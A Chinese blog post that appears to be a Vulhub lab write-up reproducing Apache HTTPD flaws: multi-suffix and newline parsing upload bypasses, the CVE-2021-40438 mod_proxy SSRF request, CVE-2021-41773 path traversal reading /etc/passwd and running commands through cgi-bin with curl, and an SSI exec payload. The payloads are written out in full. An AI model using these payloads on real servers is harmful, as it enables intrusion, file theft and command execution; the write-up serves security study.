vulhub漏洞复现26_HTTPD

最新推荐文章于 2024-02-17 20:22:01 发布
最新推荐文章于 2024-02-17 20:22:01 发布
阅读量612 收藏 2
点赞数
文章标签: php 安全 apache web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122769127
版权
本文详细介绍了Apache HTTPD的多个安全漏洞,包括多后缀解析漏洞、换行解析漏洞、2.4.48版本的mod_proxy SSRF漏洞以及2.4.49版本的路径穿越漏洞。通过复现这些漏洞,展示了如何利用它们进行文件解析、服务器内部资源访问以及路径穿越等操作。同时提到了Apache SSI远程命令执行的利用场景。
摘要由CSDN通过智能技术生成

一、 Apache HTTPD 多后缀解析漏洞

漏洞原理

Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件:

```

AddType text/html .html

AddLanguage zh-CN .cn

```

其给`.html`后缀增加了media-type,值为`text/html`;给`.cn`后缀增加了语言,值为`zh-CN`。此时,如果用户请求文件`index.cn.html`,他将返回一个中文的html页面。

以上就是Apache多后缀的特性。如果运维人员给`.php`后缀增加了处理器:

```

AddHandler application/x-httpd-php .php

```

那么,在有多个后缀的情况下,只要一个文件含有`.php`后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。

漏洞环境

运行如下命令启动一个稳定版Apache,并附带PHP 7.3环境:

靶场:192.168.4.10_ubuntu

#docker-compose up -d

漏洞复现

1. 环境运行后,访问`http://your-ip/uploadfiles/apache.php.jpeg`即可发现,phpinfo被执行了,该文件被解析为php脚本。

2. `http://your-ip/index.php`中是一个白名单检查文件后缀的上传组件,上传完成后并未重命名。我们可以通过上传文件名为`xxx.php.jpg`或`xxx.php.jpeg`的文件,利用Apache解析漏洞进行getshell。

2.1 写test.php.jpg

 

2.2 上传test.php.jpg

2.3 访问文件

二、 CVE-2017-15715Apache HTTPD 换行解析漏洞

漏洞原理

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,`1.php\x0A`将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

漏洞环境

#docker-compose build

#docker-compose up -d

启动后Apache运行在`http://your-ip:8080`。

 

漏洞复现

上传一个名为1.php的文件,被拦截:

 

 

在1.php后面插入一个`\x0A`(注意,不能是`\x0D\x0A`,只能是一个`\x0A`),不再拦截:

 

访问刚才上传的`/1.php%0a`,发现能够成功解析,但这个文件不是php后缀,说明目标存在解析漏洞:

三、 CVE-2021-40438_Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞

漏洞原理

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.48及以前的版本中,mod_proxy模块存在一处逻辑错误导致攻击者可以控制反向代理服务器的地址,进而导致SSRF漏洞。

漏洞环境

执行如下命令编译及运行一个Apache HTTP Server 2.4.43服务器:

```

docker-compose build

docker-compose up -d

```

服务器启动后,访问可以看到一个Apache Tomcat的示例页面,此时Apache HTTP Server是以中间反代服务器的身份,运行在客户端(用户)和后端服务器(Tomcat)之间,Apache和Tomcat通过AJP协议进行通信。

 

漏洞复现

发送如下数据包,可见我们已经成功请求到`http://example.com`(可临时搭建一个,在192.168.4.29_kali搭建测试)的页面并返回:

```

GET /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://192.168.4.29:11111/ HTTP/1.1

Host: 192.168.4.10:8080

Accept-Encoding: gzip, deflate

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

Connection: close

Content-Length: 4 

```

四、 CVE-2021-41773_Apache HTTP Server 2.4.49 路径穿越漏洞

漏洞原理

Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本中,引入了一个路径穿越漏洞,满足下面两个条件的Apache服务器将会受到影响:

1. 版本等于2.4.49

2. 穿越的目录允许被访问,比如配置了`<Directory />Require all granted</Directory>`。(默认情况下是不允许的)

攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。

漏洞环境

执行如下命令编译及运行一个存在漏洞的Apache HTTPd 2.4.49版本服务器:

```

docker-compose build

docker-compose up -d

```

环境启动后,访问`http://your-ip:8080`即可看到Apache默认的`It works!`页面。

 

漏洞利用

(注意其中的`/icons/`必须是一个存在且可访问的目录):

http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

可见,成功读取到`/etc/passwd`:

 

在服务端开启了cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令:

```

curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

```

 

五、 Apache SSI 远程命令执行漏洞

漏洞原理

在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用`<!--#exec cmd="id" -->`语法执行任意命令。

漏洞环境

运行一个支持SSI与CGI的Apache服务器:

```

docker-compose up -d

```

环境启动后,访问`http://your-ip:8080/upload.php`,即可看到一个上传表单。

 

漏洞复现

正常上传PHP文件是不允许的,我们可以上传一个shell.shtml文件:

```shtml

<!--#exec cmd="ls" -->

```

 

成功上传,然后访问shell.shtml,可见命令已成功执行:

 

Revenge_scan
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用Vulnhub漏洞 - mini_httpd任意文件读取漏洞(CVE-2018-18778)
JiangBuLiu的博客
07-12 1957
mini_httpd任意文件读取漏洞(CVE-2018-18778)Vulnhub官方教程漏洞原理过程启动环境端口设置浏览器设置BurpSuit设置漏洞 Vulnhub官方教程 https://vulhub.org/#/environments/mini_httpd/CVE-2018-18778/ 漏洞原理 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下...
Vulhub-httpd
Mccc_li的博客
08-09 236
文章目录Apache HTTPD 多后缀解析漏洞Apache HTTPD 换行解析漏洞 Apache HTTPD 多后缀解析漏洞 由于管理员启用了错误的配置文件导致文件被解析。 以下配置会导致文件后缀中有.php的就会被当作拍黄片文件来解析 测试: 上传一个jpg格式的文件 访问看看: 发php代码被解析 Apache HTTPD 换行解析漏洞 ...
vulhub-httpd
bqnagus
10-01 161
vulhub-httpd
Vulhub之Apache HTTPD 多后缀解析漏洞(一)
sygg12345666的博客
12-07 448
Vulhub之Apache HTTPD 多后缀解析漏洞(一) 1. 启动漏洞环境 2. 编写上传文件,修改后缀名 3.上传文件,浏览器解析获得地址 4.进入获取的地址
mini_httpd.rar_Linux cgi_httpd cgi_linux 服务器_mini httpd_mini_h
07-14
《Linux CGI HTTPD:mini_httpd的探索与应用》 在信息技术日新月异的今天,小型、轻量级的HTTP服务器在各种应用场景中扮演着重要角色,尤其在嵌入式设备、个人服务器或者测试环境中。mini_httpd就是这样一个专为...
svn_httpd_subversion.rar_httpd s
09-19
标题中的"svn_httpd_subversion.rar_httpd s"暗示了我们即将探讨的是关于Subversion(简称SVN)的HTTP协议实,通常通过Apache HTTP Server(httpd)进行配置。Subversion是一个版本控制系统,用于管理软件项目的源...
micro_httpd_12dec2005.rar_micro httpd
09-20
在“micro_httpd_12dec2005”这个压缩包中,包含了这个服务器的源代码和可能的编译或运行脚本。开发者或学习者可以下载解压后,查看源代码,了解其实细节,甚至可以根据自己的需求进行修改和扩展。 使用micro_...
w.c.gz_HTTPD://W_httpd_httpd server_world
09-14
simple httpd server hello world
mini_httpd(php).rar_mini_httpd.rar_site:www.pudn.com
09-19
用户需先将"mini_httpd.c"源文件进行编译,生成可执行程序,然后通过系统服务管理工具(如systemd或init.d)设置启动脚本,使服务器能在系统启动时自动运行。 然而,仅提供静态网页服务的HTTP服务器无法满足动态...
06 - vulhub - Apache HTTPD 多后缀解析漏洞,2021年Python大厂面试分享
m0_67621628的博客
03-19 380
AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。 以上就是Apache多后缀的特性。如果运维人员给.php后缀增加了处理器: AddHandler application/x-httpd-php .php 那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识
06 - vulhub - Apache HTTPD 多后缀解析漏洞
易编橙 · 终身成长社群,相遇已是上上签!
10-15 2840
httpd是Apache超文本传输协议(HTTP)服务器的主程序。被设计为一个独立运行的后台进程,它会建立一个处理请求的子进程或线程的池。 Apache Httpd支持一个文件拥有多个后缀,不同的后缀执行不同的命令,也就是说当我们上传的文件中只要后缀名含有php,该文件就可以被解析成php文件。
Vulhub漏洞
weixin_45995579的博客
09-30 1722
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
vulhub漏洞系列之Adobe ColdFusion(cve-2010-2861文件读取漏洞、CVE-2017-3066反序列化漏洞
weixin_43071873的博客
12-10 972
CVE-2010-2861)Adobe ColdFusion 文件读取漏洞 一、漏洞简介 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 二、漏洞影响 Adobe ColdFusion 8 Adobe ColdFusion 9 三、漏洞 直接访问http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=…/…/…/…/…/…/…/…/…/…/etc/passwd%00en,即可
vulhub靶场shiro系列漏洞CVE-2010-3863、CVE-2016-4437(shiro550)、CVE-2020-1957、shiro721
qq_58873970的博客
07-25 1208
以上shiro反序列化,权限绕过,shiro-721 代码执行也可以用上面工具检测到并利用工具下载地址shiro反序列化综合利用工具:https://github.com/j1anFen/shiro_attack/releasesshiro漏洞检测工具yakit:https://github.com/yaklang/yakit/tags。
Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸
离别歌
10-18 6221
周五晚上开始学习Apache HTTP Server(后文简称为Apache)mod_proxy的SSRF漏洞(CVE-2021-40438),并在星球简单介绍了一下编译、调试Apache...
Apache Httpd 常见漏洞解析(全)
最新发布
黑战士的博客
02-17 3043
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
Apache SSRF漏洞(CVE-2021-40438)
热门推荐
weixin_47311099的博客
12-07 1万+
Apache HTTP Server 2.4.48 mod_proxy SSRF漏洞(CVE-2021-40438) Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.48及以前的版本中,mod_proxy模块存在一处逻辑错误导致攻击者可以控制反向代理服务器的地址,进而导致SSRF漏洞。 参考链接 https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438/README.zh-cn.md
CVE(2017-15715、2021-41773、2021-40438)漏洞
weixin_55843787的博客
03-24 4602
CVE(2017-15715、2021-41773、2021-40438)漏洞
CYG_HTTPD_HANDLER_TABLE_ENTRY宏的原型
05-30
`CYG_HTTPD_HANDLER_TABLE_ENTRY` 是一个宏,用于定义 HTTPd 服务器的请求处理函数。其原型如下: ```c #define CYG_HTTPD_HANDLER_TABLE_ENTRY(uri, method, handler, arg) \ { uri, method, handler, arg } ``` ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值